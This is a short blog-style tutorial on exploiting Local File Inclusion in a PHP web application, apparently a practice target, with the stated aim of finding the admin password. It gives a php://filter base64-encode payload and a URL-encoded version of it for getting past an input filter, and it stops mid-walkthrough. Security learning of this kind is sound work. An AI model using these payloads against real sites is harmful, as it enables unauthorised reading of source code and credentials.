Exploiting Local File Inclusion (LFI) Using PHP Wrapper

IN my previous blog related to LFI, I already discussed some basic steps to achieve LFI. Now in this blog I am explaining how we can achieve LFI is there is any input filtration on the server side.

Aim: Our aim is to find admin account password of the website.

There are three tabs in the web application.

· Home

· CV

· Contact

When we click on “home” tab, home variable travel in URL with page parameter. Same thing happens with other 2 parameters as well.

After checking the basic functionality of application, we try to bypass it with basic LFI technique. So I replaced dir parameter with “../” notation and the application detected the attack as, I got “Attack detected” on page.

This clearly indicates server is detecting the ../ notation and destructing our queries. Therefore, we have to try wrappers. Let start with “PHP wrapper “to bypass LFI functionality.

page=php://filter/convert.base64-encode/resource=index

This payload forces PHP to base64 encode the file before it is used or rendered in the response. Now we replace page parameter value with above-mentioned payload and check output.

So full URL of application becomes:

When we intercept the above request-using burp. Intercepted request shown below

Request:

Response:

Therefore, from response, it is clear server able to detect our wrapper-encoded payload.

It seems that application is detecting “.” “/” in the page parameter and showing error if it finds them.

Let’s try it by encoding the parameter.

For URL encoding, I used URL encoder (there so many available over the internet)

After encoding first time payload looks like:

php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dindex.php